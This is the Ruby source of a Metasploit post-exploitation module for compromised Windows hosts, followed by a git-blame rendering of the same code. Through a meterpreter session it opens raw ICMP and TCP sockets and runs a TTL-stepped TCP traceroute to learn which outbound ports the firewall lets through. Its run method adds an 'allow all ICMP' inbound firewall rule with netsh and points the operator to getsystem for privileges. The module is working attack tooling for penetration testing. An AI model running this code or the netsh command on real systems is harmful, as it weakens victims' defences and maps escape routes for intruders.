metasploit-framework/modules/post/windows/recon/outbound_ports.rb

# -*- coding: binary -*-

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Priv

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Outbound-Filering Rules',
      'Description'   => %q{
        This module makes some kind of TCP traceroute to get outbound-filtering rules.
        It will try to make a TCP connection to a certain public IP address (this IP
        does not need to be under your control) using different TTL incremental values.
        This way if you get an answer (ICMP ttl time exceeded packet) from a public IP
        device you can infer that the destination port is allowed. Setting STOP to
        true the module will stop as soon as you reach a public IP (this will generate
        less noise in the network).
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'References'   => [
        [ 'URL', 'http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html' ]
      ]
    ))

    register_options(
      [
        OptAddress.new("ADDRESS" , [ true, 'Destination IP address.']),
        OptInt.new('HOPS', [true, 'Number of hops to get.', 3]),
        OptInt.new('MIN_TTL', [true, 'Starting TTL value.', 1]),
        OptString.new('PORTS', [true, 'Ports to test (e.g. 80,443,100-110).','80,443']),
        OptInt.new('TIMEOUT', [true, 'Timeout for the ICMP socket.', 3]),
        OptBool.new('STOP', [true, 'Stop when it finds a public IP.', false])
      ], self.class)
  end

  def icmp_setup
    handler = client.railgun.ws2_32.socket("AF_INET", "SOCK_RAW", "IPPROTO_ICMP")
    if handler['GetLastError'] != 0
      print_error("There was an error setting the ICMP raw socket; GetLastError: #{handler['GetLastError']}")
      return nil
    end
    vprint_status("ICMP raw socket created successfully")

    r = client.railgun.ws2_32.bind(handler['return'],"\x02\x00\x00\x00" << Rex::Socket.addr_aton(session.session_host) << "\x00"*8 ,16)
    if r['GetLastError'] != 0
      print_error("There was an error binding the ICMP socket to #{session.session_host}; GetLastError: #{r['GetLastError']}")
      return nil
    end
    vprint_status("ICMP socket successfully bound to #{session.session_host}")

    # int WSAIoctl(
    # _In_   SOCKET s,
    # _In_   DWORD dwIoControlCode,
    # _In_   LPVOID lpvInBuffer,
    # _In_   DWORD cbInBuffer,
    # _Out_  LPVOID lpvOutBuffer,
    # _In_   DWORD cbOutBuffer,
    # _Out_  LPDWORD lpcbBytesReturned,
    # _In_   LPWSAOVERLAPPED lpOverlapped,
    # _In_   LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
    # );

    sio_rcvall = 0x98000001
    r = client.railgun.ws2_32.WSAIoctl(handler['return'],sio_rcvall,"\x01",4,nil,0,4,nil,nil)
    if r['GetLastError'] != 0
      print_error("There was an error calling WSAIoctl (ICMP raw socket); GetLastError: #{r['GetLastError']}")
      return nil
    end
    return handler['return']
  end

  def tcp_setup(ttl)
    handler = client.railgun.ws2_32.socket("AF_INET", "SOCK_STREAM", "IPPROTO_TCP")
    if handler['GetLastError'] != 0
      print_error("There was an error setting the TCP socket; GetLastError: #{handler['GetLastError']}")
      return nil
    end
    vprint_status("TCP socket created successfully")

    # 0x8004667E = FIONBIO
    # Enable non-blocking mode when *argp (third parameter in ioctlsocket) is set to a nonzero value

    cmd = 0x8004667E
    r = client.railgun.ws2_32.ioctlsocket(handler['return'], cmd, 1)
    if r['GetLastError'] != 0
      print_error("There was an error setting the TCP socket in non-blocking mode; GetLastError: #{r['GetLastError']}")
      return nil
    end
    vprint_status("TCP socket successfully configured in non-blocking mode")

    # int setsockopt(
    # _In_  SOCKET s,
    # _In_  int level,
    # _In_  int optname,
    # _In_  const char *optval,
    #_In_  int optlen
    # );

    ipproto_ip = 0
    ip_ttl = 4
    r = client.railgun.ws2_32.setsockopt(handler['return'], ipproto_ip, ip_ttl, [ttl].pack('C'), 4)
    if r['GetLastError'] != 0
      print_error("There was an error setting the TTL value; GetLastError: #{r['GetLastError']}")
      return nil
    end
    vprint_status("TTL value successfully set to #{ttl}")
    return handler['return']
  end

  def connections(remote, dst_port, h_icmp, h_tcp, to)
    r = client.railgun.ws2_32.connect(h_tcp, "\x02\x00" << [dst_port].pack("n") << Rex::Socket.addr_aton(remote) << "\x00"*8 , 16)

    # A GetLastError == 1035 is expected since the socket is set to non-blocking mode
    if r['GetLastError'] != 10035
      print_error("There was an error creating the connection to the peer #{remote}; GetLastError: #{r['GetLastError']}")
      return
    end

    from = " " * 16

    begin
      ::Timeout.timeout(to) do
        r = client.railgun.ws2_32.recvfrom(h_icmp, "\x00" * 100, 100, 0, from, 16)
        hop = Rex::Socket.addr_ntoa(r['from'][4..7])
        return hop
      end
    rescue ::Timeout::Error
      return nil
    end

  end

  def run
    unless is_admin?
      print_error("You don't have enough privileges. Try getsystem.")
      return
    end

    if sysinfo['OS'] =~ /XP/
      print_error('Windows XP is not supported')
      return
    end

    output = cmd_exec('netsh',' advfirewall firewall add rule name="All ICMP v4" dir=in action=allow protocol=icmpv4:any,any')
    print_status("ICMP firewall IN rule established: #{output}")

    session.railgun.ws2_32
    remote = datastore['ADDRESS']
    to = datastore['TIMEOUT']

    ports = Rex::Socket.portspec_crack(datastore['PORTS'])

    ports.each do |dport|
      print_status("Testing port #{dport}...")
      0.upto(datastore['HOPS'] - 1) { |i|
        i = i + datastore['MIN_TTL']
        h_icmp = icmp_setup
        return if h_icmp.nil?
        h_tcp = tcp_setup(i)
        return if h_tcp .nil?

        hop = connections(remote, dport, h_icmp, h_tcp, to)
        if hop != nil
          print_good("#{i} #{hop}")
          if datastore['STOP'] == true and !Rex::Socket.is_internal?(hop)
            print_good("Public IP reached. The port #{dport} is not filtered")
            break
          end
        else
          print_error("#{i} *")
        end

        client.railgun.ws2_32.closesocket(h_tcp)
        client.railgun.ws2_32.closesocket(h_icmp)
       }
    end
  end
end
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`# -- coding: binary --`

			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit3 < Msf::Post`
			`include Msf::Post::Windows::Priv`

			`def initialize(info={})`
			`super( update_info( info,`
Do minor cleanup 2014-11-25 23:35:07 +00:00			`'Name' => 'Windows Outbound-Filering Rules',`
			`'Description' => %q{`
			`This module makes some kind of TCP traceroute to get outbound-filtering rules.`
			`It will try to make a TCP connection to a certain public IP address (this IP`
			`does not need to be under your control) using different TTL incremental values.`
			`This way if you get an answer (ICMP ttl time exceeded packet) from a public IP`
			`device you can infer that the destination port is allowed. Setting STOP to`
			`true the module will stop as soon as you reach a public IP (this will generate`
			`less noise in the network).`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'References' => [`
Ports default values added, is_internal REX function added, reference added 2014-11-13 09:10:25 +00:00			`[ 'URL', 'http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html' ]`
			`]`
Do minor cleanup 2014-11-25 23:35:07 +00:00			`))`

Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`register_options(`
			`[`
			`OptAddress.new("ADDRESS" , [ true, 'Destination IP address.']),`
			`OptInt.new('HOPS', [true, 'Number of hops to get.', 3]),`
			`OptInt.new('MIN_TTL', [true, 'Starting TTL value.', 1]),`
Ports default values added, is_internal REX function added, reference added 2014-11-13 09:10:25 +00:00			`OptString.new('PORTS', [true, 'Ports to test (e.g. 80,443,100-110).','80,443']),`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`OptInt.new('TIMEOUT', [true, 'Timeout for the ICMP socket.', 3]),`
			`OptBool.new('STOP', [true, 'Stop when it finds a public IP.', false])`
			`], self.class)`
			`end`

			`def icmp_setup`
			`handler = client.railgun.ws2_32.socket("AF_INET", "SOCK_RAW", "IPPROTO_ICMP")`
			`if handler['GetLastError'] != 0`
			`print_error("There was an error setting the ICMP raw socket; GetLastError: #{handler['GetLastError']}")`
			`return nil`
			`end`
			`vprint_status("ICMP raw socket created successfully")`
session.tunnel_peer changed by session.session_host. Other minor changes 2014-11-26 11:08:54 +00:00
Rex::Socket.to_sockaddr changed 2014-11-26 16:51:05 +00:00			`r = client.railgun.ws2_32.bind(handler['return'],"\x02\x00\x00\x00" << Rex::Socket.addr_aton(session.session_host) << "\x00"*8 ,16)`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`if r['GetLastError'] != 0`
session.tunnel_peer changed by session.session_host. Other minor changes 2014-11-26 11:08:54 +00:00			`print_error("There was an error binding the ICMP socket to #{session.session_host}; GetLastError: #{r['GetLastError']}")`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`return nil`
			`end`
session.tunnel_peer changed by session.session_host. Other minor changes 2014-11-26 11:08:54 +00:00			`vprint_status("ICMP socket successfully bound to #{session.session_host}")`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00
			`# int WSAIoctl(`
			`# _In_ SOCKET s,`
			`# _In_ DWORD dwIoControlCode,`
			`# _In_ LPVOID lpvInBuffer,`
			`# _In_ DWORD cbInBuffer,`
			`# _Out_ LPVOID lpvOutBuffer,`
			`# _In_ DWORD cbOutBuffer,`
			`# _Out_ LPDWORD lpcbBytesReturned,`
			`# _In_ LPWSAOVERLAPPED lpOverlapped,`
			`# _In_ LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine`
			`# );`

			`sio_rcvall = 0x98000001`
			`r = client.railgun.ws2_32.WSAIoctl(handler['return'],sio_rcvall,"\x01",4,nil,0,4,nil,nil)`
			`if r['GetLastError'] != 0`
			`print_error("There was an error calling WSAIoctl (ICMP raw socket); GetLastError: #{r['GetLastError']}")`
			`return nil`
			`end`
			`return handler['return']`
			`end`

			`def tcp_setup(ttl)`
			`handler = client.railgun.ws2_32.socket("AF_INET", "SOCK_STREAM", "IPPROTO_TCP")`
			`if handler['GetLastError'] != 0`
			`print_error("There was an error setting the TCP socket; GetLastError: #{handler['GetLastError']}")`
			`return nil`
			`end`
			`vprint_status("TCP socket created successfully")`

session.tunnel_peer changed by session.session_host. Other minor changes 2014-11-26 11:08:54 +00:00			`# 0x8004667E = FIONBIO`
			`# Enable non-blocking mode when *argp (third parameter in ioctlsocket) is set to a nonzero value`

Do minor cleanup 2014-11-25 23:35:07 +00:00			`cmd = 0x8004667E`
			`r = client.railgun.ws2_32.ioctlsocket(handler['return'], cmd, 1)`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`if r['GetLastError'] != 0`
			`print_error("There was an error setting the TCP socket in non-blocking mode; GetLastError: #{r['GetLastError']}")`
			`return nil`
			`end`
			`vprint_status("TCP socket successfully configured in non-blocking mode")`

			`# int setsockopt(`
			`# _In_ SOCKET s,`
			`# _In_ int level,`
			`# _In_ int optname,`
			`# _In_ const char *optval,`
			`#_In_ int optlen`
			`# );`

Do minor cleanup 2014-11-25 23:35:07 +00:00			`ipproto_ip = 0`
			`ip_ttl = 4`
			`r = client.railgun.ws2_32.setsockopt(handler['return'], ipproto_ip, ip_ttl, [ttl].pack('C'), 4)`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`if r['GetLastError'] != 0`
			`print_error("There was an error setting the TTL value; GetLastError: #{r['GetLastError']}")`
			`return nil`
			`end`
			`vprint_status("TTL value successfully set to #{ttl}")`
			`return handler['return']`
			`end`

Do minor cleanup 2014-11-25 23:35:07 +00:00			`def connections(remote, dst_port, h_icmp, h_tcp, to)`
Rex::Socket.to_sockaddr changed 2014-11-26 16:51:05 +00:00			`r = client.railgun.ws2_32.connect(h_tcp, "\x02\x00" << [dst_port].pack("n") << Rex::Socket.addr_aton(remote) << "\x00"*8 , 16)`

Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`# A GetLastError == 1035 is expected since the socket is set to non-blocking mode`
			`if r['GetLastError'] != 10035`
			`print_error("There was an error creating the connection to the peer #{remote}; GetLastError: #{r['GetLastError']}")`
			`return`
			`end`

Do minor cleanup 2014-11-25 23:35:07 +00:00			`from = " " * 16`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00
			`begin`
			`::Timeout.timeout(to) do`
recvfrom allocation changed 2014-12-14 17:58:48 +00:00			`r = client.railgun.ws2_32.recvfrom(h_icmp, "\x00" * 100, 100, 0, from, 16)`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`hop = Rex::Socket.addr_ntoa(r['from'][4..7])`
			`return hop`
			`end`
			`rescue ::Timeout::Error`
			`return nil`
			`end`

			`end`

			`def run`
Do minor cleanup 2014-11-25 23:35:07 +00:00			`unless is_admin?`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`print_error("You don't have enough privileges. Try getsystem.")`
			`return`
			`end`

Do minor cleanup 2014-11-25 23:35:07 +00:00			`if sysinfo['OS'] =~ /XP/`
			`print_error('Windows XP is not supported')`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`return`
			`end`

Do minor cleanup 2014-11-25 23:35:07 +00:00			`output = cmd_exec('netsh',' advfirewall firewall add rule name="All ICMP v4" dir=in action=allow protocol=icmpv4:any,any')`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`print_status("ICMP firewall IN rule established: #{output}")`

			`session.railgun.ws2_32`
			`remote = datastore['ADDRESS']`
			`to = datastore['TIMEOUT']`

			`ports = Rex::Socket.portspec_crack(datastore['PORTS'])`

			`ports.each do \|dport\|`
			`print_status("Testing port #{dport}...")`
Do minor cleanup 2014-11-25 23:35:07 +00:00			`0.upto(datastore['HOPS'] - 1) { \|i\|`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`i = i + datastore['MIN_TTL']`
			`h_icmp = icmp_setup`
Do minor cleanup 2014-11-25 23:35:07 +00:00			`return if h_icmp.nil?`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`h_tcp = tcp_setup(i)`
Do minor cleanup 2014-11-25 23:35:07 +00:00			`return if h_tcp .nil?`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00
			`hop = connections(remote, dport, h_icmp, h_tcp, to)`
			`if hop != nil`
			`print_good("#{i} #{hop}")`
Do minor cleanup 2014-11-25 23:35:07 +00:00			`if datastore['STOP'] == true and !Rex::Socket.is_internal?(hop)`
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`print_good("Public IP reached. The port #{dport} is not filtered")`
			`break`
			`end`
			`else`
			`print_error("#{i} *")`
			`end`
Do minor cleanup 2014-11-25 23:35:07 +00:00
Add post-exploitation module to get FW filtering rules 2014-11-12 16:38:49 +00:00			`client.railgun.ws2_32.closesocket(h_tcp)`
			`client.railgun.ws2_32.closesocket(h_icmp)`
			`}`
			`end`
			`end`
			`end`